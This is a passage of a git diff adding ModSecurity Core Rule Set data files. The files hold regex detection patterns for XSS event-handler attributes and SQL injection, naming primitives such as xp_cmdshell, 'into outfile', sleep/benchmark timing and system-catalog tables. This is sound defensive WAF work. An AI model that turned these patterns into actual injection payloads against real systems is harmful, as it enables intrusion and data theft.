+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?= diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data new file mode 100644 index 000000000..83668cc94 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942120.data @@ -0,0 +1,21 @@ +\!\= +\&\& +\|\| +>> +<< +>= +<= +<> +<=> +\bxor\b +\bregexp\b +regexp\s+binary +\bisnull\b +\brlike\b +rlike\s+binary +not\s+between\s+0\s+and +is\s+null +like\s+null +^in[+\s]*\([\s\d\"]+[^()]*\) +\Win[+\s]*\([\s\d\"]+[^()]*\) +<>\s+binary diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data new file mode 100644 index 000000000..432281104 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942130.data @@ -0,0 +1,16 @@ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b) +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+ +[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data new file mode 100644 index 000000000..9ef24c987 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942140.data @@ -0,0 +1,25 @@ +database\W*\( +db_name\W*\( +information_schema\b +master\.\.sysdatabases\b +msdb\b +msysaccessobjects\b +msysaccessstorage\b +msysaccessxml\b +msysaces\b +msysmodules2\b +msysmodules\b +msysobjects\b +msysqueries\b +msysrelationships\b +mysql\.db\b +northwind\b +pg_catalog\b +pg_toast\b +schema_name\b +schema\W*\( +sqlite_master\b +sqlite_temp_master\b +sysaux\b +sys\.database_name\b +tempdb\b diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data new file mode 100644 index 000000000..66f1ed820 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942150.data @@ -0,0 +1,236 @@ +abs +acos +adddate +addtime +aes_decrypt +aes_encrypt +ascii +asciistr +asin +atan +atan2 +avg +benchmark +bin +bin_to_num +bit_and +bit_count +bit_length +bit_or +bit_xor +cast +ciel +cieling +char_length +char +character_length +charset +chr +coalesce +coercibility +collation +compress +concat_ws +concat +connection_id +conv +convert_tz +convert +cos +cot +count +dcount +cr32 +curdate +current_date +current_time +current_timestamp +current_user +curtime +database +date +date_add +date_format +date_sub +datediff +day +dayname +dayofmonth +dayofweek +dayofyear +decode +default +degrees +des_decrypt +des_encrypt +dump +elt +encode +encrypt +exp +export_set +extract +extractvalue +field +field_in_set +find_in_set +floor +format +found_rows +from_base64 +from_days +from_unixtime +get_format +get_lock +greatest +group_concat +hex +hextoraw +rawtohex +hour +if +ifnull +in +inet6_aton +inet6_ntoa +inet_aton +inet_ntoa +insert +instr +interval +isnull +is_free_lock +is_ipv4_compat +is_ipv4_mapped +is_ipv4 +is_ipv6 +is_not_null +is_not +is_null +is_used_lock +last +last_day +last_inser_id +lcase +least +left +length +ln +load_file +local +localtimestamp +locate +log +log2 +log10 +lower +lpad +ltrim +make_set +makedate +master_pos_wait +max +md5 +microsecond +mid +min +minute +mod +month +monthname +name_const +not_in +now +nullif +oct +octet_length +old_password +ord +password +period_add +period_diff +pi +position +pow +power +procedure_analyse +quarter +quote +radians +rand +release_lock +repeat +replace +reverse +right +round +row_count +rpad +rtrim +schema +sec_to_time +second +session_user +sha +sha1 +sha2 +sign +sin +pg_sleep +sleep +soundex +space +sqrt +std +stddev_pop +stddev_samp +str_to_date +strcmp +subdate +substring +substring_index +substr +subtime +sum +sysdate +system_user +tan +time +timestamp +timestampadd +timestampdiff +timediff +time_format +time_to_sec +to_base64 +todays +toseconds +tochar +tonchar +trim +truncate +ucase +uncompress +uncompressed_length +unhex +unix_timestamp +updatexml +upper +user +utc_date +utc_time +utc_timestamp +uuid +uuid_short +values +var_pop +var_samp +variance +version +week +weekday +weekofyear +weight_string +year +yearweek +xmltype diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data new file mode 100644 index 000000000..18d61e72b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942170.data @@ -0,0 +1,6 @@ +select\s+benchmark\s*?\(\s*?[(]?\s*?\w+ +;\s+benchmark\s*?\(\s*?[(]?\s*?\w+ +select\s+if\s*?\(\s*?[(]?\s*?\w+ +;\s+if\s*?\(\s*?[(]?\s*?\w+ +select\s+sleep\s*?\(\s*?[(]?\s*?\w+ +;\s+sleep\s*?\(\s*?[(]?\s*?\w+ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data new file mode 100644 index 000000000..8ab41df92 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942180.data @@ -0,0 +1,21 @@ +\d[\"'`]\s+[\"'`]\s+\d +^admin\s*?[\"'`] +(?:/\*)+[\"'`]+\s? +(?:/\*)+[\"'`]+\s?-- +(?:/\*)+[\"'`]+\s?# +(?:/\*)+[\"'`]+\s?/\* +(?:/\*)+[\"'`]+\s?{ +[\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] +[\"'`]\s*?[^\w\s]?=\s*?[\"'`] +[\"'`]\W*?[+=]+\W*?[\"'`] +[\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$ +[\"'`]\s*?[!=|][\d\s!=]+.*?\d+$ +[\"'`]\s*?like\W+[\w\"'`(] +\sis\s*?0\W +where\s[\s\w\.,-]+\s= +[\"'`][<>~]+[\"'`] diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data new file mode 100644 index 000000000..3745cb110 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942190.data @@ -0,0 +1,20 @@ +[\"'`]\s*?!\s*?[\"'`\w] +[\"'`];?\s*?having\b\s*?[^\s] +[\"'`];?\s*?select\b\s*?[^\s] +[\"'`];?\s*?union\b\s*?[^\s] +\s*?exec.*?\Wxp_cmdshell +\s*?execute.*?\Wxp_cmdshell +\wiif\s*?\( +connection_id\s*?\([^\)]*? +current_user\s*?\([^\)]*? +database\s*?\([^\)]*? +exec\s+master\. +execute\s+master\. +from\W+information_schema\W +into[\s+]+dumpfile\s*?[\"'`] +into[\s+]+outfile\s*?[\"'`] +schema\s*?\([^\)]*? +select.*?\w?user\( +union select @ +union[\w(\s]*?select +user\s*?\([^\)]*? diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-942200.data 